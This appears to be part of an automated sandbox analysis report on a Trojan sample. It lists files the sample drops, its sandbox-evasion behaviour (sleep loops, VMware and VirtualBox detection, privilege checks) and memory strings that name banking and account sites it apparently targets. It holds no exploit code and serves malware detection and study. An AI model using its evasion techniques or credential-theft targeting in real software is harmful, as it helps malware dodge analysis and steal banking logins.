Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\python38.dll Jump to dropped file
Found evaded block containing many API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Evaded block: after key decision
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe Evaded block: after key decision
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe API coverage: 1.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 6428 Thread sleep count: 293 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6428 Thread sleep time: -263700s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 320 Thread sleep count: 7531 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 320 Thread sleep time: -3765500000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6428 Thread sleep count: 233 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6428 Thread sleep time: -209700s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4160 Thread sleep time: -147000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7160 Thread sleep time: -900000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4160 Thread sleep time: -9688000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe TID: 4760 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe TID: 5948 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9466F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 0_2_00007FF6CF9466F0
Source: C:\Windows\explorer.exe Code function: 3_2_11056AE0 lstrcpy,lstrcatA,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcatA,lstrcatA,lstrcpy,lstrcatA,lstrcatA,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA, 3_2_11056AE0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA66F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 4_2_00007FF6BCCA66F0
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA666F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 5_2_00007FF78FA666F0
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B66F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 9_2_00007FF7A34B66F0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 10_2_00007FF779E979B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E985A0 FindFirstFileExW,FindClose, 10_2_00007FF779E985A0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 10_2_00007FF779EB0B84
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E985A0 FindFirstFileExW,FindClose, 12_2_00007FF779E985A0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 12_2_00007FF779E979B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 12_2_00007FF779EB0B84
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8342DFC FindFirstFileExW, 12_2_00007FF8B8342DFC
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B836EFEC FindFirstFileExW,FindClose,FindNextFileW, 12_2_00007FF8B836EFEC
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F5566F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 13_2_00007FF67F5566F0
Source: C:\Windows\explorer.exe Code function: 3_2_08B72CE0 GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualQuery,VirtualAlloc, 3_2_08B72CE0
Source: C:\Windows\System32\svchost.exe Thread delayed: delay time: 500000 Jump to behavior
Source: C:\Windows\explorer.exe Thread delayed: delay time: 90000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: explorer.exe, 00000003.00000002.3316980175.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2105614725.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000003.00000000.2100969793.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3316980175.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002A05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: JYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: explorer.exe, 00000003.00000003.3097906687.0000000009C05000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: FAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNIL
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe, 00000000.00000002.2070000024.0000025F1A96C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000003.00000002.3311346197.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000003.00000003.2679125905.0000000003542000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: svchost.exe Binary or memory string: vboxservice.exe
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000003.00000002.3311346197.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: svchost.exe Binary or memory string: vboxtray.exe
Source: explorer.exe, 00000003.00000002.3311346197.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.2679125905.0000000003542000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: svchost.exe Binary or memory string: vmware.exe
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
